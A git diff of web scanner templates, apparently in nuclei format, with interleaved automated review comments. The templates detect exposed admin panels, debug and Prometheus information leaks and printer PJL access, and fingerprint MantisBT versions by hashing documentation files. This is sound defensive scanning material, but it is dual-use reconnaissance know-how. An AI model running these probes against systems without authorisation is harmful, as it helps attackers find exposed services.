name: Panabit Panel Detect author: ffffffff0x @@ -7,10 +8,12 @@ info: metadata: fofa-query: app="Panabit-智能网关" tags: panabit,panel + requests: - method: GET path: - "{{BaseURL}}/login/login.htm" + redirects: true max-redirects: 2 matchers-condition: and @@ -19,6 +22,7 @@ requests: part: body words: - 'Panabit' + - type: status status: - 200 diff --git a/poc/other/plesk-obsidian-9597.yaml b/poc/other/plesk-obsidian-9597.yaml index 09b8d6f0eb..9fdeccf21f 100644 --- a/poc/other/plesk-obsidian-9597.yaml +++ b/poc/other/plesk-obsidian-9597.yaml 
@@ -1,29 +1,24 @@ id: plesk-obsidian - info: name: Plesk Obsidian author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6951 tags: panel,plesk - requests: - method: GET path: - '{{BaseURL}}/login_up.php' - matchers-condition: and matchers: - type: word words: - 'Plesk Obsidian' - - type: status status: - 200 - extractors: - type: regex group: 1 regex: - - '(?i)([A-Za-z 0-9.]+)' \ No newline at end of file + - '(?i)([A-Za-z 0-9.]+)' diff --git a/poc/other/plesk-onyx.yaml b/poc/other/plesk-onyx.yaml index fdd918af75..ce27005046 100644 --- a/poc/other/plesk-onyx.yaml +++ b/poc/other/plesk-onyx.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6501 - tags: panel,plesk,login + tags: panel requests: - method: GET path: diff --git a/poc/other/postmessage-tracker-9640.yaml b/poc/other/postmessage-tracker-9640.yaml index a091ac8494..a2e802d4b6 100644 --- a/poc/other/postmessage-tracker-9640.yaml +++ b/poc/other/postmessage-tracker-9640.yaml @@ -1,12 +1,11 @@ id: postmessage-tracker - info: name: Postmessage Tracker author: pdteam severity: info - reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js + reference: + - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js tags: headless,postmessage - headless: - steps: - action: setheader 
@@ -18,33 +17,32 @@ headless: args: hook: true code: | - (function() {window.alerts = []; + () => { + window.alerts = []; - function logger(found) { - window.alerts.push(found); - } + logger = found => window.alerts.push(found); - function getStackTrace () { - var stack; - try { - throw new Error(''); - } - catch (error) { - stack = error.stack || ''; + function getStackTrace() { + var stack; + try { + throw new Error(''); + } catch (error) { + stack = error.stack || ''; + } + + stack = stack.split('\n').map(line => line.trim()); + return stack.splice(stack[0] == 'Error' ? 2 : 1); } - stack = stack.split('\n').map(function (line) { return line.trim(); }); - return stack.splice(stack[0] == 'Error' ? 2 : 1); - } - var oldListener = Window.prototype.addEventListener; + var oldListener = Window.prototype.addEventListener; - Window.prototype.addEventListener = function(type, listener, useCapture) { - if(type === 'message') { - logger(getStackTrace()); - } - return oldListener.apply(this, arguments); - }; - })(); + Window.prototype.addEventListener = (type, listener, useCapture) => { + if (type === 'message') { + logger(getStackTrace()); + } + return oldListener.apply(this, arguments); + }; + } - args: url: "{{BaseURL}}" action: navigate @@ -52,7 +50,7 @@ headless: - action: script name: alerts args: - code: "window.alerts" + code: window.alerts matchers: - type: word part: alerts diff --git a/poc/other/powerlogic-ion.yaml b/poc/other/powerlogic-ion.yaml index 4f414942fe..a2dc55dd44 100644 --- a/poc/other/powerlogic-ion.yaml +++ b/poc/other/powerlogic-ion.yaml @@ -3,7 +3,8 @@ info: name: PowerLogic ION Exposed author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/6810 + reference: + - https://www.exploit-db.com/ghdb/6810 tags: panel requests: - method: GET diff --git a/poc/other/printers-info-leak.yaml b/poc/other/printers-info-leak.yaml index 2b49588f9a..6391d0a246 100644 --- a/poc/other/printers-info-leak.yaml 
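Review bot: The override of `Window.prototype.addEventListener` in the hook script is now an arrow function, so `this` and `arguments` inside it no longer refer to the call's receiver and parameters. `oldListener.apply(this, arguments)` will therefore not forward the page's listener registration the way the removed `function` version did. Keep a regular function for the override: `Window.prototype.addEventListener = function (type, listener, useCapture) {`. The same hunk makes `logger` an implicit global; `const logger = found => window.alerts.push(found);` keeps it local to the hook. Whether the engine invokes the new `() => { ... }` wrapper as it ran the old IIFE is not visible in this hunk and is worth confirming.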
+++ b/poc/other/printers-info-leak.yaml @@ -1,5 +1,4 @@ id: printers-info-leak - info: name: Unauthorized Printer Access author: pussycat0x @@ -7,9 +6,6 @@ info: reference: - https://book.hacktricks.xyz/pentesting/9100-pjl tags: network,iot,printer - metadata: - mongoid: 0000 - network: - inputs: - data: "@PJL INFO STATUS\n" diff --git a/poc/other/prometheus-flags-endpoint.yaml b/poc/other/prometheus-flags-endpoint.yaml index 5b2256ae03..ad5a884ecf 100644 --- a/poc/other/prometheus-flags-endpoint.yaml +++ b/poc/other/prometheus-flags-endpoint.yaml @@ -1,38 +1,29 @@ id: prometheus-flags - info: name: Prometheus flags API endpoint author: geeknik severity: info description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. - reference: - - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,leak - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/api/v1/status/flags" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data":' - '"config.file":' condition: and - - type: word part: header words: - 'application/json' - extractors: - type: regex name: web_admin_enabled diff --git a/poc/other/proxy-checker.yaml b/poc/other/proxy-checker.yaml new file mode 100644 index 0000000000..0561c43ed6 --- /dev/null +++ b/poc/other/proxy-checker.yaml 
@@ -0,0 +1,31 @@ +id: proxy-checker +info: + name: Proxy Checker + author: roninja + severity: info + +variables: + PROXY: "{{BaseURL}}" + +code: + - engine: + - sh + - bash + source: | + curl -vL -x $PROXY https://bacconsultings.org --connect-timeout 10 --max-time 15 + matchers-condition: and + matchers: + - type: word + words: + - "weebly" + condition: and + + - type: word + words: + - "bac-consulting" + condition: and + + - type: word + words: + - "BAC" +# digest: 4a0a0047304502203169f03cd3d120e7badba2a2470dc1842b7f68f10981d7edfe480bbad066c8f50221009bb0968266d066dec7e606d594cfade06012b5b73e7ec81f9b03b0d33a446bfa:e13c478fa5c4541f06589b8ff90dea85 \ No newline at end of file diff --git a/poc/other/psmessage.yaml b/poc/other/psmessage.yaml index 2d66e25559..0b4b57ca9d 100644 --- a/poc/other/psmessage.yaml +++ b/poc/other/psmessage.yaml @@ -1,19 +1,19 @@ id: addeventlistener-detect info: - name: DOM EventListener detection - author: yavolo,dwisiswant0 + name: AddEventlistener detection + author: yavolo severity: info - tags: xss,misc + tags: xss reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source requests: - method: GET path: - - "{{BaseURL}}" + - '{{BaseURL}}' matchers: - - type: regex - part: body - regex: - - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 + - type: word + words: + - 'window.addEventListener(' + part: body \ No newline at end of file diff --git a/poc/other/pulse-secure-panel-9715.yaml b/poc/other/pulse-secure-panel-9715.yaml index c21b8845cc..55cb67a8e2 100644 --- a/poc/other/pulse-secure-panel-9715.yaml +++ b/poc/other/pulse-secure-panel-9715.yaml 
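Review bot: `$PROXY` is expanded unquoted in the `curl` line of the `source` block and is filled from `{{BaseURL}}`, so a target entry containing whitespace or glob characters is word-split into extra curl arguments on the scanning host. Quote it: `curl -vL -x "$PROXY" https://bacconsultings.org --connect-timeout 10 --max-time 15`. The three word matchers depend on the current content of a third-party site, and `BAC` is short enough to match unrelated pages. A `description` explaining why these strings indicate a working proxy would help, and `condition: and` on single-word lists has no effect.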
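Review bot: The new word matcher in poc/other/psmessage.yaml only finds the literal `window.addEventListener(`, so pages that register listeners as bare `addEventListener(` or through another reference are no longer reported, which the removed regex covered. If the narrower match is meant to cut noise, say so in a `description`; otherwise match the method name itself with `- 'addEventListener('`.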
@@ -3,17 +3,21 @@ info: name: Pulse Secure VPN Panel author: bsysop severity: info + tags: panel,pulse,vpn requests: - method: GET path: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" + - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" + stop-at-first-match: true matchers-condition: or matchers: - type: word - words: - - "/dana-na/auth/welcome.cgi" part: header - - type: word words: - - "/dana-na/css/ds.css" + - "/dana-na/auth/welcome.cgi" + - type: regex part: body + regex: + - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" diff --git a/poc/other/pypicloud-panel.yaml b/poc/other/pypicloud-panel.yaml index ed93546114..984e2eeabd 100644 --- a/poc/other/pypicloud-panel.yaml +++ b/poc/other/pypicloud-panel.yaml @@ -1,19 +1,17 @@ id: pypicloud-panel - info: name: Pypicloud panel detection author: Supras severity: info - reference: https://pypicloud.readthedocs.io/en/latest/ + reference: + - https://pypicloud.readthedocs.io/en/latest/ metadata: - google-query: 'intext:pypicloud' + google-query: intext:pypicloud tags: panel,pypicloud - requests: - method: GET path: - '{{BaseURL}}/login' - matchers-condition: and matchers: - type: word @@ -22,7 +20,6 @@ requests: - 'Pypicloud' - '' condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/other/rack-mini-profiler-9788.yaml b/poc/other/rack-mini-profiler-9788.yaml index 78ca392d9d..ff2a5a8a47 100644 --- a/poc/other/rack-mini-profiler-9788.yaml +++ b/poc/other/rack-mini-profiler-9788.yaml 
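Review bot: The `.` before `css` in the new body regex is unescaped, so `(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css` accepts any character in that position. Escape it and use single quotes so the backslash survives YAML parsing: `- '(?i)/dana-na/css/ds(_[a-f0-9]{64})?\.css'`. With `matchers-condition: or` either matcher alone reports a panel, so a short comment on why the header match on `/dana-na/auth/welcome.cgi` is sufficient by itself would help.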
@@ -1,22 +1,21 @@ id: rack-mini-profiler - info: - name: rack-mini-profiler environment information disclosure + name: rack-mini-profiler - Environment Information Disclosure author: vzamanillo severity: high + description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. tags: config,debug,rails - requests: - method: GET path: - "{{BaseURL}}/?pp=env" - matchers-condition: and matchers: - type: word words: - "Rack Environment" - - type: status status: - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/other/rack-mini-profiler.yaml b/poc/other/rack-mini-profiler.yaml index 78ca392d9d..c4fe9d6826 100644 --- a/poc/other/rack-mini-profiler.yaml +++ b/poc/other/rack-mini-profiler.yaml @@ -1,10 +1,9 @@ id: rack-mini-profiler info: - name: rack-mini-profiler environment information disclosure + name: rack-mini-profiler environmnet information discloure author: vzamanillo severity: high - tags: config,debug,rails requests: - method: GET @@ -16,7 +15,6 @@ requests: - type: word words: - "Rack Environment" - - type: status status: - 200 diff --git a/poc/other/request-based-interaction.yaml b/poc/other/request-based-interaction.yaml index 04667ffb6d..c237d72fc4 100644 --- a/poc/other/request-based-interaction.yaml +++ b/poc/other/request-based-interaction.yaml @@ -4,8 +4,7 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed DNS Name from the request. - reference: - - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface + reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface tags: oast,ssrf,generic requests: - raw: diff --git a/poc/other/robots-9887.yaml b/poc/other/robots-9887.yaml index 3093fb1602..00667893d7 100644 --- a/poc/other/robots-9887.yaml +++ b/poc/other/robots-9887.yaml 
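Review bot: The new `name` in poc/other/rack-mini-profiler.yaml is misspelled (`environmnet information discloure`) and the `tags: config,debug,rails` line is removed, so tag-based template selection will no longer pick this template up. Restore `name: rack-mini-profiler environment information disclosure` and keep the tags line. The sibling rack-mini-profiler-9788.yaml in this commit gains a `description` and keeps its tags; the two copies would be easier to maintain if they agreed.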
@@ -3,7 +3,7 @@ info: name: robots.txt file author: CasperGN severity: info - tags: misc,generic + requests: - method: GET path: @@ -14,10 +14,12 @@ requests: - type: word words: - "Disallow:" + - type: word words: - text/plain part: header + - type: dsl dsl: - "len(body)>=140 && status_code==200" diff --git a/poc/other/scs-landfill-control-10098.yaml b/poc/other/scs-landfill-control-10098.yaml index 52f192bb32..4500e3e023 100644 --- a/poc/other/scs-landfill-control-10098.yaml +++ b/poc/other/scs-landfill-control-10098.yaml @@ -1,16 +1,18 @@ id: scs-landfill-control + info: name: SCS Landfill Remote Monitoring Control + description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. + reference: https://www.scsengineers.com/services/remote-monitoring-control/ author: geeknik severity: info - description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. - reference: - - https://www.scsengineers.com/services/remote-monitoring-control/ tags: panel,scs,rmc,iot + requests: - method: GET path: - "{{BaseURL}}" + redirects: true matchers-condition: and matchers: diff --git a/poc/other/securenvoy-panel-10114.yaml b/poc/other/securenvoy-panel-10114.yaml index 138ed7d13c..a8d75ddb16 100644 --- a/poc/other/securenvoy-panel-10114.yaml +++ b/poc/other/securenvoy-panel-10114.yaml @@ -1,23 +1,19 @@ id: securenvoy-panel - info: name: SecurEnvoy Admin Login author: 0xrod severity: info tags: panel,securenvoy - requests: - method: GET path: - "{{BaseURL}}/secadmin/" - matchers-condition: and matchers: - type: word words: - '' part: body - - type: status status: - 200 diff --git a/poc/other/security-txt.yaml b/poc/other/security-txt.yaml index 50f38f1ac1..2ac4a1a846 100644 
--- a/poc/other/security-txt.yaml +++ b/poc/other/security-txt.yaml @@ -4,12 +4,14 @@ info: author: bad5ect0r severity: info description: The website defines a security policy. - tags: misc + tags: misc,generic requests: - method: GET path: - "{{BaseURL}}/.well-known/security.txt" - "{{BaseURL}}/security.txt" + redirects: true + max-redirects: 3 matchers-condition: and matchers: - type: status diff --git a/poc/other/shell-history.yaml b/poc/other/shell-history.yaml index f6762a888b..1e715e7760 100644 --- a/poc/other/shell-history.yaml +++ b/poc/other/shell-history.yaml @@ -42,5 +42,5 @@ requests: - "application/xml" - "html>" - "text/html" - part: all + part: response negative: true diff --git a/poc/other/signatures-10269.yaml b/poc/other/signatures-10269.yaml index 7e85ceb20a..5d36cadb2a 100644 --- a/poc/other/signatures-10269.yaml +++ b/poc/other/signatures-10269.yaml 
@@ -1,20 +1,23916 @@ -id: mantisbt -info: - name: mantisbt - author: cn-kali-team - tags: detect,tech,mantisbt - severity: info - metadata: - product: mantisbt - vendor: mantisbt - verified: true -http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - - alt="mantis bugtracker - - powered by mantis bugtracker - case-insensitive: true +id: mantisbt + +info: + name: mantisbt_version_fingerprint + severity: info + author: glatisant & erwan + +requests: + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Revision_History.xml" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5c1554f443900ddd0c249b2bb2dfd316\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"202ca0131c0770ae1be1e7f675007730\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"99e46f2d7682fc524eeffc49172a4d09\" == md5(body))" + - type: dsl + name: 2.5.0 + dsl: + - "(\"66c1836c80cf212de0551e902effbc8f\" == md5(body))" + - type: dsl + name: 2.4.2 + dsl: + - "(\"6d9ce94f2721367f21b4b6f457a0d1a8\" == md5(body))" + - type: dsl + name: 2.4.1 + dsl: + - "(\"a589fdc1d9321004aab77ca66ea44218\" == md5(body))" + - type: dsl + name: 2.4.0 + dsl: + - "(\"926ea517a8ad26ab5df2255b378cabba\" == md5(body))" + - type: dsl + name: 2.3.3 + dsl: + - "(\"1debf70035fbbbcf2c27feb7a6ca3081\" == md5(body))" + - type: dsl + name: 2.3.2 + dsl: + - "(\"ea6f0b17f787aa865751f6ca26519a03\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.1 + dsl: + - "(\"781bdaaadc0d6818f2457a7b54aa726a\" == md5(body))" + - type: dsl + name: 2.2.3 - 2.2.4 + dsl: + - "(\"6cdc4fe6a708c8e0dd4646e4604a68c2\" == md5(body))" + - type: dsl + name: 2.2.2 + dsl: + - "(\"591c04a8dd7d7bb7520f05f271c599f6\" == md5(body))" + - type: dsl + name: 2.2.1 + dsl: + - "(\"fc8669de934c3a7345500772410c4f71\" == md5(body))" + - type: dsl + name: 2.2.0 + dsl: + - "(\"422c54dbcf38e404d709ed8d966f11a2\" == md5(body))" + - type: dsl + name: 2.1.2 - 2.1.3 + dsl: + - "(\"edb928da7fc6d22e5c1e642169da1acb\" == 
md5(body))" + - type: dsl + name: 2.1.1 + dsl: + - "(\"7e0ace03076b72e4f8cf8ded8451c3b9\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.0 + dsl: + - "(\"2c6d8a0a1e9e8fad9b2e40e07753052d\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"d21b8286047c8ec85ff72fa33d1e65e5\" == md5(body))" + - type: dsl + name: 1.3.9 + dsl: + - "(\"27fd50fed8765aeb163c5abd2310dc84\" == md5(body))" + - type: dsl + name: 1.3.8 + dsl: + - "(\"f1892663aa1f96e81c253ddac5d7fc2b\" == md5(body))" + - type: dsl + name: 1.3.7 + dsl: + - "(\"91371b305677cc9404d1a38c7e6a7b62\" == md5(body))" + - type: dsl + name: 1.3.6 + dsl: + - "(\"672b2564a96946d8c45e332cceab7369\" == md5(body))" + - type: dsl + name: 1.3.5 + dsl: + - "(\"be9eb546abb021b9c87b870a351ec16a\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"1191036dc6a10da1a82803019e3ea76d\" == md5(body))" + - type: dsl + name: 1.3.3 + dsl: + - "(\"0b2d995ddd6cd1b65f2f52818452c22b\" == md5(body))" + - type: dsl + name: 1.3.2 + dsl: + - "(\"09d14008aeca907817bb1fe3a188fa77\" == md5(body))" + - type: dsl + name: 1.3.12 + dsl: + - "(\"b557afdad4c473424acbdec444cdde1c\" == md5(body))" + - type: dsl + name: 1.3.11 + dsl: + - "(\"4e33cf4ec01547485c274aca3cd9250c\" == md5(body))" + - type: dsl + name: 1.3.10 + dsl: + - "(\"9f07394bfb43d64718c1d0a396d489b7\" == md5(body))" + - type: dsl + name: 1.3.1 + dsl: + - "(\"3713902596727653d716611c54a56752\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"bb12b57c0f930c669b5b9de2d8db97d9\" == md5(body))" + - type: dsl + name: 2.7.0 + dsl: + - "(\"d75f35c886cda1f78dc7a36d22b172da\" == md5(body))" + - type: dsl + name: 2.8.0 + dsl: + - "(\"ad626b3e54aa22a7e516a397ed421588\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"71a99cdadc9c532ddfcc865b64b4aa92\" == md5(body))" + - type: dsl + name: 2.9.0 + dsl: + - "(\"eb5e226b7c6be2b4af20d81dbac5392c\" == md5(body))" + - type: dsl + name: 2.8.1 + dsl: + - "(\"e302c1a5d0a95863560b4d19a4dfdc52\" == md5(body))" + - type: dsl + name: 
1.3.13 + dsl: + - "(\"392b7fd2c11763e0a3af59a7246970fd\" == md5(body))" + - type: dsl + name: 2.10.0 + dsl: + - "(\"8d7f7a57490e287944fb6ae16a6cc2ed\" == md5(body))" + - type: dsl + name: 2.9.1 + dsl: + - "(\"415bbc6e9e59bc1fd7a92050e32ce72b\" == md5(body))" + - type: dsl + name: 2.11.0 + dsl: + - "(\"26aaf5c6a4af7709fe589ae95d31cfd6\" == md5(body))" + - type: dsl + name: 2.10.1 + dsl: + - "(\"9c1f7a10afc9a98c9ab931df7d8817cc\" == md5(body))" + - type: dsl + name: 1.3.14 + dsl: + - "(\"c8e603b5f06055f9e74a4753da6f2435\" == md5(body))" + - type: dsl + name: 2.12.0 + dsl: + - "(\"ddbae28e58dd2aea8720ad7549e874e6\" == md5(body))" + - type: dsl + name: 2.11.1 + dsl: + - "(\"c9f3f38a94ea4221695fa0fa0f1472cb\" == md5(body))" + - type: dsl + name: 2.13.1 + dsl: + - "(\"1a05ac0f16974fcab5895f90c75cc76e\" == md5(body))" + - type: dsl + name: 2.13.0 + dsl: + - "(\"a1fa897e75a0b912bdb48432e1efb3de\" == md5(body))" + - type: dsl + name: 2.12.2 + dsl: + - "(\"2b3759615a29d4136c2e37d5959fd43e\" == md5(body))" + - type: dsl + name: 2.12.1 + dsl: + - "(\"2274751d84fa467e07c663269d1708b8\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"2fec12f466ac1ce8a4d598b9db162fa0\" == md5(body))" + - type: dsl + name: 2.13.2 + dsl: + - "(\"c71dd9141af31ad7b383c7c925e4395c\" == md5(body))" + - type: dsl + name: 1.3.15 + dsl: + - "(\"ef6b4911a69cfe72975aca0fe3345926\" == md5(body))" + - type: dsl + name: 2.15.0 + dsl: + - "(\"6cc1a27201e8f362f375a12ee488c1e2\" == md5(body))" + - type: dsl + name: 2.16.0 + dsl: + - "(\"cde882ba15dd82b93b4023edd0eb1be6\" == md5(body))" + - type: dsl + name: 2.15.1 + dsl: + - "(\"aa8689281de96c8ec7a1a62f364f6303\" == md5(body))" + - type: dsl + name: 2.17.1 + dsl: + - "(\"a928e13ffc1d05d87f711977e01a72da\" == md5(body))" + - type: dsl + name: 2.17.0 + dsl: + - "(\"f815840f85bad0e74e715f2da60edb69\" == md5(body))" + - type: dsl + name: 2.16.1 + dsl: + - "(\"ecfa2c02fa7b4dc598b8db42aaac33b8\" == md5(body))" + - type: dsl + name: 1.3.16 + dsl: + - 
"(\"2f496fced4feba074b159870d4102580\" == md5(body))" + - type: dsl + name: 2.18.0 + dsl: + - "(\"bb19274dc5da6f703414cadb1c9fa8f3\" == md5(body))" + - type: dsl + name: 2.17.2 + dsl: + - "(\"6adeadf66fc352ba6c4a39438bde7c10\" == md5(body))" + - type: dsl + name: 2.19.0 + dsl: + - "(\"da71bbb03fc5893050d8466db96f43cf\" == md5(body))" + - type: dsl + name: 2.18.1 + dsl: + - "(\"51e0d169e5fc2cc843deff6d0856b3de\" == md5(body))" + - type: dsl + name: 1.3.17 + dsl: + - "(\"c72c07c3afde2f6275785f0e2516781b\" == md5(body))" + - type: dsl + name: 2.20.0 + dsl: + - "(\"4ff69bb0afaf535e0371a2324885e6e2\" == md5(body))" + - type: dsl + name: 2.19.1 + dsl: + - "(\"3c6c550b249e9fa3a0eb42514543c92c\" == md5(body))" + - type: dsl + name: 1.3.18 + dsl: + - "(\"89a267b60651354d72464f0f1381bd84\" == md5(body))" + - type: dsl + name: 2.21.0 + dsl: + - "(\"143bc3f54e5b49a177f243c7df5077f1\" == md5(body))" + - type: dsl + name: 2.20.1 + dsl: + - "(\"9c1d670813c1551eab7bc4b42d5869c9\" == md5(body))" + - type: dsl + name: 2.21.1 + dsl: + - "(\"071a92e5c8eab4873a46170e20b8b13f\" == md5(body))" + - type: dsl + name: 2.21.2 + dsl: + - "(\"2b53eea9b0bd96c56d194ad9f78b451e\" == md5(body))" + - type: dsl + name: 2.22.0 + dsl: + - "(\"d496be85a0fe2c5c1292f543f2c113b4\" == md5(body))" + - type: dsl + name: 2.21.3 + dsl: + - "(\"6f7e301eca787ccdef27e02702666626\" == md5(body))" + - type: dsl + name: 1.3.19 + dsl: + - "(\"f74489f84c7cbc4938003a95466fb80a\" == md5(body))" + - type: dsl + name: 2.22.1 + dsl: + - "(\"72c71c3242acfe489f686da7aaf2529a\" == md5(body))" + - type: dsl + name: 1.3.20 + dsl: + - "(\"95464bb8d859c25538da38371f4decd0\" == md5(body))" + - type: dsl + name: 2.23.0 + dsl: + - "(\"dcaad70ac8cb31ca3e59d9d9b4bf0b04\" == md5(body))" + - type: dsl + name: 2.22.2 + dsl: + - "(\"4ff255da393f466498eb6496cc852cc8\" == md5(body))" + - type: dsl + name: 2.24.0 + dsl: + - "(\"87804a5cff08ef126762563214c96aec\" == md5(body))" + - type: dsl + name: 2.23.1 + dsl: + - 
"(\"2e618341b5e41f430f4c5f9d040dc1b2\" == md5(body))" + - type: dsl + name: 2.24.1 - 2.24.3 + dsl: + - "(\"2ab79158b167bf2d0a8d4d0d803ab9c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Revision_History.xml" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"1d62249cc358ada078b4b16e85072e61\" == md5(body))" + - type: dsl + name: 2.5.2 + dsl: + - "(\"3dd7bf1fc99e67a0467746d57298baad\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"4f447272839c6e4e9c920b2ae1116eaa\" == md5(body))" + - type: dsl + name: 2.5.0 + dsl: + - "(\"4261b3505d757ab1392637abbb6e027b\" == md5(body))" + - type: dsl + name: 2.4.2 + dsl: + - "(\"e491aed829283a5802c1578af28e6087\" == md5(body))" + - type: dsl + name: 2.4.1 + dsl: + - "(\"a2221ca6f3b6278596962612fcaa2d6e\" == md5(body))" + - type: dsl + name: 2.4.0 + dsl: + - "(\"6bb9313cdb28ae28c0bbc9195b6ede1a\" == md5(body))" + - type: dsl + name: 2.3.3 + dsl: + - "(\"bbe9c48c14cb1a16ceaadb6bcae5ed55\" == md5(body))" + - type: dsl + name: 2.3.2 + dsl: + - "(\"7d9990be1aef6af3aed874f1b66604ee\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.1 + dsl: + - "(\"8983cc50b22e2e674ebc62fc600a6294\" == md5(body))" + - type: dsl + name: 2.2.3 - 2.2.4 + dsl: + - "(\"de52d2d05ad6b8aafef4ec0686f2190b\" == md5(body))" + - type: dsl + name: 2.2.2 + dsl: + - "(\"7f1c36e8de1ddcb199ed1b99529f9a5a\" == md5(body))" + - type: dsl + name: 2.2.1 + dsl: + - "(\"e39211dda138a2bebf6205f6b41d34b6\" == md5(body))" + - type: dsl + name: 2.2.0 + dsl: + - "(\"e2a6bc57127bded7169983d560c0282e\" == md5(body))" + - type: dsl + name: 2.1.2 - 2.1.3 + dsl: + - "(\"0deb135f9503d8d9f89de456dd6250b9\" == md5(body))" + - type: dsl + name: 2.1.1 + dsl: + - "(\"432763b82ff19f7fa1091b43c1948057\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.0 + dsl: + - "(\"23e1e49e52df3bb268a9ba316b1797ef\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"c62db2a388b082ceebd7cd72b306ae2d\" == md5(body))" + - type: dsl + name: 
1.3.9 - 1.3.10 + dsl: + - "(\"b28dc72e376da1742f86e8379707c6e3\" == md5(body))" + - type: dsl + name: 1.3.8 + dsl: + - "(\"c19171a656a7747453748a1aaac9ffd5\" == md5(body))" + - type: dsl + name: 1.3.7 + dsl: + - "(\"44e884d367cbc99616ac3f083e6da093\" == md5(body))" + - type: dsl + name: 1.3.6 + dsl: + - "(\"db01a3d618a1f2007424bd7a5c90f889\" == md5(body))" + - type: dsl + name: 1.3.5 + dsl: + - "(\"891afab3de42b03570e8364be564d027\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"38cd5c87a5316ef157046e1e621cefb7\" == md5(body))" + - type: dsl + name: 1.3.3 + dsl: + - "(\"7f7f39c103949e2e90bebc2bf1a157bc\" == md5(body))" + - type: dsl + name: 1.3.2 + dsl: + - "(\"16af70ef9312e133d4b524c378ae6347\" == md5(body))" + - type: dsl + name: 1.3.12 + dsl: + - "(\"297080d02959c1ad054198cdf286e067\" == md5(body))" + - type: dsl + name: 1.3.11 + dsl: + - "(\"defa45e011b5163ede82d711b5b3e5f3\" == md5(body))" + - type: dsl + name: 1.3.1 + dsl: + - "(\"476d2659b4fcaaa59b4813552b3d1d43\" == md5(body))" + - type: dsl + name: 1.3.0 + dsl: + - "(\"9877e71219dd63552a9c7b6f2af91eb6\" == md5(body))" + - type: dsl + name: 2.7.0 + dsl: + - "(\"15cc16f66e08ca423015386ab8e7fb26\" == md5(body))" + - type: dsl + name: 2.8.0 + dsl: + - "(\"ba250106563313f6b08da7f51c60e349\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"074e96a33e6af6a4ebb5434fc67d2d4f\" == md5(body))" + - type: dsl + name: 2.9.0 + dsl: + - "(\"16256206a0158fddedc118f39a80fe80\" == md5(body))" + - type: dsl + name: 2.8.1 + dsl: + - "(\"d4d97f1c08724914a76b169320e8cf9f\" == md5(body))" + - type: dsl + name: 1.3.13 + dsl: + - "(\"ee78b8fdb68a14d1e28c909acf241bcf\" == md5(body))" + - type: dsl + name: 2.10.0 + dsl: + - "(\"4a7cce945a97b97ab119e0b95f2d984e\" == md5(body))" + - type: dsl + name: 2.9.1 + dsl: + - "(\"f6a0562b8795a63e3fc54bcdd055289f\" == md5(body))" + - type: dsl + name: 2.11.0 + dsl: + - "(\"7150ea96d207d2c63fae6fc4a822efdb\" == md5(body))" + - type: dsl + name: 2.10.1 + dsl: + - 
